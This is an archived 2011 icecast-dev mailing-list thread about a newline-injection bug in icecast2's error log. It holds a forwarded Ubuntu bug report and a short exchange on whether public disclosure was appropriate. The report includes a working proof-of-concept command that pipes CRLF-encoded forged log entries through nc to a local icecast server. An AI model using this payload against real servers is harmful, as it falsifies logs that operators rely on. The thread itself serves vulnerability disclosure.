A security bug was reported by Moritz Naumann against icecast in Ubuntu. You are being emailed as the upstream contact. Please keep oss-security at lists.openwall.com[1] CC'd for any updates on this issue. This issue should be considered public and has not yet been assigned a CVE. Details from the public bug follow: https://launchpad.net/bugs/894782 From the reporter: "Newline injection in error.log Running this command against an icecast2 running on 127.0.0.1... echo -ne "GET /non-existent"'"'"%20No%20such%20file%20or%20directory%0d% 0a[1970-01-01%20%2000:00:00]%20PHUN%20I'm%20feeling%20phunny%0d% 0a["`date "+%Y-%m-%d%%20%%20%H:%M:%S"`"]%20WARN% 20fserve/fserve_client_create%20req%20for%20file% 20"'"'"/usr/share/icecast2/web/ HTTP/1.0\n\n" | nc -vv 127.0.0.1 8000> /dev/null...causes the following to be written to /var/log/icecast2/error.log: [2011-11-25 15:37:31] INFO fserve/fserve_client_create checking for file /non-existent" No such file or directory [1970-01-01 00:00:00] PHUN I'm feeling phunny ..." Thanks in advance for your cooperation in coordinating a fix for this issue. [1] oss-security at lists.openwall.com is a public mailing list for people to collaborate on security vulnerabilities and coordinate security updates. -- Jamie Strandboge | http://www.canonical.com -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 836 bytes Desc: This is a digitally signed message part Url : http://lists.xiph.org/pipermail/icecast-dev/attachments/20111215/4e9cc93c/attachment.pgp
*snip* Sending this to a public mailing list might not have been the smartest idea. We're already aware of Moritz's finding and are working on a fix. Expect icecast release 2.3.3 soon. Best regards Thomas Ruecker
Jamie Strandboge
2011-Dec-15 19:17 UTC
[Icecast-dev] [oss-security] RE: Security issue in icecast
On Thu, 2011-12-15 at 20:31 +0200, Thomas.Rucker at tieto.com wrote:> *snip* > Sending this to a public mailing list might not have been the smartest idea.I considered this a low impact vulnerability and therefore followed the procedures for reporting to oss-security. Additionally, I looked for a security contact at http://www.icecast.org/contact.php but could not find one, so I sent to the list since it said this was a valid way to submit bugs. If the issue were more severe, I would have followed a different procedure. I apologize for the inconvenience.> We're already aware of Moritz's finding and are working on a fix. > > Expect icecast release 2.3.3 soon.Glad to hear. Thanks! -- Jamie Strandboge | http://www.canonical.com -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 836 bytes Desc: This is a digitally signed message part Url : http://lists.xiph.org/pipermail/icecast-dev/attachments/20111215/1eb466ad/attachment.pgp